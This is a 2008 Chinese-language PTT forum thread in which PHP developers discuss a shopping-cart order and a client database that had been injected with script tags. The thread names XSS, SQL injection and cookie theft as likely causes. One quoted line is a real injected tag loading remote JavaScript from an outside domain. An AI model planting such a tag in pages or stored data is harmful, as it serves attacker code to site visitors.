Re: [請益] 我的客戶被詐騙集團打電話了..

作者JYHuang (夏天到了，冷不起來了說)

看板PHP

標題Re: [請益] 我的客戶被詐騙集團打電話了..

時間Fri Jun 6 21:33:13 2008

※ 引述《reflynet ()》之銘言： : 首先可能要先說明一下,我有個購物車是用ecshop的. : 前幾天有一筆訂單的內文出現了<script src="http://i69s.cn/c.js"></script> : 當下不以為意,就把那一筆訂單刪掉了.. ==恕刪== 看到這我想到前陣子幫客戶做系統轉移的程式改寫時 (ASP -> PHP) 發現客戶的資料庫被入侵修改，一堆資料都被加了一堆類似上面的Script 另一個聽到案例也是用ASP 不知道是不是IIS有漏洞的關係不知道您的購物車是用何種程式呢？ -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 118.160.142.121

推 ybite:這種XSS攻擊應該和ISS關係不大，是購物車程式的問題吧 06/06 21:34

→ JYHuang:因為我遇到的情形是整個資料庫都被加料 06/06 22:29

→ JYHuang:XSS攻擊應該比較難弄到整個資料庫.. 06/06 22:30

→ ybite:應該是搭配了一些AJAX上的漏洞的關係... 06/06 22:47

推 reflynet:這是程式在收來自使用者資料的時候沒有過濾完整.. 06/06 23:05

→ reflynet:不管是c, perl, asp, cfm, php, aspx 都有可能發生.. 06/06 23:06

推 rabbithenry:這類型的攻擊大多是偷得使用者Cookie的資料 06/06 23:18

→ rabbithenry:畢竟Ajax有跨網域限制，偷帳號密碼容易多了 06/06 23:19

→ rabbithenry:尤其拿到管理員帳號權限＝無所不能... 06/06 23:19

→ arianda:sql injection也有可能 06/07 01:30